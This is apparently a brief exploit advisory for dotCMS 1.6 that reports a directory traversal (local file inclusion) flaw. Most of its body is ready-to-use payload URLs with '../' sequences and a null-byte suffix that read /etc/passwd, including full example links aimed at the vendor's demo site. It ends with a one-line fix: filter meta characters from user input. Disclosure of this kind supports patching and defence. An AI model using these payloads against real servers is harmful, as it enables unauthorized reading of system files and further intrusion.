dotCMS version 1.6 suffers from local file inclusion vulnerabilities.
238cf060ce4e3175071ef6fb197d302bfd77b0beea9121b7c4c66dc8a7966ca0
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ script:dotCMS
+ home: http://www.dotcms.org
+ demo: http://www.dotcms.org/the_dotcms/demos/demo.dot
+ founder: Don of h4cky0u.org
+ Vulnerability: Directory traversal
++++++++++++++++++++++++++++++++++++++++++++++++++++++
exploit:
/index.dot?id=../../../../../../../../etc/passwd%00.jpg
/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html
example:
http://demo.dotcms.org/news/index.dot?id=../../../../../../../../etc/passwd%00.jpg
http://demo.dotcms.org/getting_started/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html
solution:
Script should filter meta characters from user input.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++